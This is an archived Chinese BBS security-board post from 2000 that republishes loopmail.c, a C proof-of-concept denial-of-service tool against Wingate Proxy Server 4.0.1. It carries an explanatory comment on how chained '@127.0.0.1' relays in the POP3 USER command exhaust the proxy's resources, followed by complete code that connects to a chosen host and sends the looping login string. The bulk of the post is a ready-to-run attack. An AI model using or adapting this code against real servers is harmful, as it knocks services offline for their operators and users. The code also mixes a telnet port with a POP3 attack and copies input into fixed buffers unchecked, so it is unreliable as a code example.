274.htm

unix高级编程原吗

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center">               ● UNIX网络编程                       (BM: clown)                </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p   align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="192.htm">上一层</a>][<a href="275.htm">下一篇</a>]
<hr><p align="left"><small>发信人: scz (小四), 信区: Security <br>
标  题: loopmail.c <br>
发信站: 武汉白云黄鹤站 (Tue Jul 25 22:55:10 2000), 站内信件 <br>
  <br>
/* <br>
   This is a proof of concept code written for the Wingate Proxy server. Origin <br>
l <br>
   idea by Gregory Duchemin and emplemented by Cyber_Bob. Tested against Wingat <br>
   Proxy Server 4.0.1 on Windows 98. This code was thrown together in about 5 <br>
   minutes so if it's sloppy that's probably why. <br>
  <br>
   OVERVIEW (from Greg's post to BugTraq): <br>
  <br>
   I have recently downloaded a trial version of wingate proxy server 4.0.1 and <br>
   installed it on a win98 box. <br>
   While playing arround with the pop3 proxy feature, i have discovered that <br>
   the software allows pop3 address encapsulation in the USER command. <br>
   Proxying is not a native capability of POP3 protocol, to do that, wingate <br>
   need a special crafted login string in the following format: <br>
   USER login@host.domain where login is the owner of the pop3 account and <br>
   host.domain, the address of the real pop3 server to forward the request to. <br>
   The "PASS" field doesn't change. <br>
  <br>
  <br>
   if someone submit a USER command like this: <br>
  <br>
   USER login@host.domain@127.0.0.1@127.0.0.1 <br>
   PASS what3ver_u_want <br>
  <br>
   it should be accepted and the managment console whill show up 2 more active <br>
   connections. It seems there are no limitation on the size of the login and <br>
   so on the number of proxy relays we can use leading in a potential ressource <br>
   starvation DOS (memory, cpu usage etc...) <br>
*/ <br>
  <br>
  <br>
#include <stdio.h> <br>
#include <stdlib.h> <br>
#include <sys/time.h> <br>
#include <sys/types.h> <br>
#include <unistd.h> <br>
#include <sys/socket.h> <br>
#include <netinet/in.h> <br>
#include <netdb.h> <br>
#include <sys/errno.h> <br>
  <br>
  <br>
char tmp1[]="@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0 <br>
0.1@127.0.0.1"; <br>
char tmp[920], userloop[1000], pass[]="PASS whatever"; <br>
int sock; <br>
struct sockaddr_in sa; <br>
struct hostent *hp; <br>
  <br>
int main(int argc, char *argv[]){ <br>
        if(argc<2){ <br>
                printf("Usage: %s <host>\n", argv[0]); <br>
                exit(-1); <br>
        } <br>
        if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL){ <br>
                perror("Exiting, failed to resolve host..."); <br>
                exit(-1); <br>
        } <br>
        if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){ <br>
                perror("Exiting, could not open socket..."); <br>
                exit(-1); <br>
        } <br>
        sa.sin_family=AF_INET; <br>
        sa.sin_port=htons(23); <br>

        memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length); <br>
        if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0){ <br>
                perror("Exiting, could not connect to host..."); <br>
                exit(-1); <br>
        } <br>
        printf("Preparing to DoS wingate on \"%s\"... ", argv[1]); <br>
        fflush(stdout); <br>
        fflush(stdin); <br>
        printf("Done.\n"); <br>
        printf("Enter valid \"username@forwarding_server\": "); <br>
        scanf("%s", &tmp); <br>
        strcat(tmp, tmp1); <br>
        strcpy(userloop, tmp); <br>
        printf("\nSending relay loop strings... "); <br>
        write(sock,&userloop,150); <br>
        usleep(10000); <br>
        write(sock,&pass,sizeof(pass)); <br>
        usleep(10000); <br>
        printf("Done.\n"); <br>
        return 0; <br>
} <br>
-- <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="192.htm">上一层</a>][<a href="275.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>